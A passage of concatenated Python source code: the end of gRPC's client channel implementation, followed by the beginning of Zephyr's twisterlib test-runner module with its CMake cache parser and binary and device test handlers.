cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, augmented_metadata,
None if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(metadata,
initial_metadata_flags),
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata,
None if credentials is None else credentials._credentials,
operationses, event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def __del__(self):
self.channel.close(cygrpc.StatusCode.cancelled, 'Channel deallocated!')
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(target=_deliver,
args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.setDaemon(True)
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.
CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[connectivity])
callbacks = tuple(
callback for callback, unused_but_known_to_be_none_connectivity in
state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
compression_option = _compression.create_channel_option(compression)
return tuple(base_options) + compression_option + ((
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),)
def _separate_channel_options(options):
"""Separates core channel options from Python channel options."""
core_options = []
python_options = []
for pair in options:
if pair[0] == grpc.experimental.ChannelOptions.SingleThreadedUnaryStream:
python_options.append(pair)
else:
core_options.append(pair)
return python_options, core_options
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials, compression):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
"""
python_options, core_options = _separate_channel_options(options)
self._single_threaded_unary_stream = _DEFAULT_SINGLE_THREADED_UNARY_STREAM
self._process_python_options(python_options)
self._channel = cygrpc.Channel(
_common.encode(target), _augment_options(core_options, compression),
credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def _process_python_options(self, python_options):
"""Sets channel attributes according to python-only channel options."""
for pair in python_options:
if pair[0] == grpc.experimental.ChannelOptions.SingleThreadedUnaryStream:
self._single_threaded_unary_stream = True
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
# NOTE(rbellevi): Benchmarks have shown that running a unary-stream RPC
# on a single Python thread results in an appreciable speed-up. However,
# due to slight differences in capability, the multi-threaded variant
# remains the default.
if self._single_threaded_unary_stream:
return _SingleThreadedUnaryStreamMultiCallable(
self._channel, _common.encode(method), request_serializer,
response_deserializer)
else:
return _UnaryStreamMultiCallable(
self._channel,
_channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer,
response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _unsubscribe_all(self):
state = self._connectivity_state
if state:
with state.lock:
del state.callbacks_and_connectivities[:]
def _close(self):
self._unsubscribe_all()
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
cygrpc.fork_unregister_channel(self)
def _close_on_fork(self):
self._unsubscribe_all()
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
try:
self._unsubscribe_all()
except: # pylint: disable=bare-except
# Exceptions in __del__ are ignored by Python anyway, but they can
# keep spamming logs. Just silence them.
pass
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testsuite.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testsuite.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.instance.status = "failed"
self.instance.execution_time = handler_time
for tc in self.instance.testcases:
tc.status = "failed"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.instance.status = "failed"
self.instance.execution_time = handler_time
self.instance.reason = "RunID mismatch"
for tc in self.instance.testcases:
tc.status = "failed"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
self.seed = None
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
# Only valid for native_posix
if self.seed is not None:
command = command + ["--seed="+str(self.seed)]
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.execution_time = handler_time
if not self.terminated and self.returncode != 0:
self.instance.status = "failed"
if run_valgrind and self.returncode == 2:
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.instance.reason = "Failed"
elif harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.status = "failed"
self.instance.reason = "Timeout"
self.instance.add_missing_testscases("blocked", "Timeout")
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.testplan = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
# ignore SerialException which may happen during the serial device
# power off/on process.
except serial.SerialException:
pass
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testsuite.harness_config.get("fixture")
for d in self.testplan.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.testplan.duts:
if serial in [d.serial_pty, d.serial]:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.testplan.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.testplan.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.testplan.west_flash and self.testplan.west_flash != []:
command_extra_args.extend(self.testplan.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
# Receive parameters from an runner_params field
# of the specified hardware map file.
for d in self.testplan.duts:
if (d.platform == self.instance.platform.name) and d.runner_params:
for param in d.runner_params:
command.append(param)
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
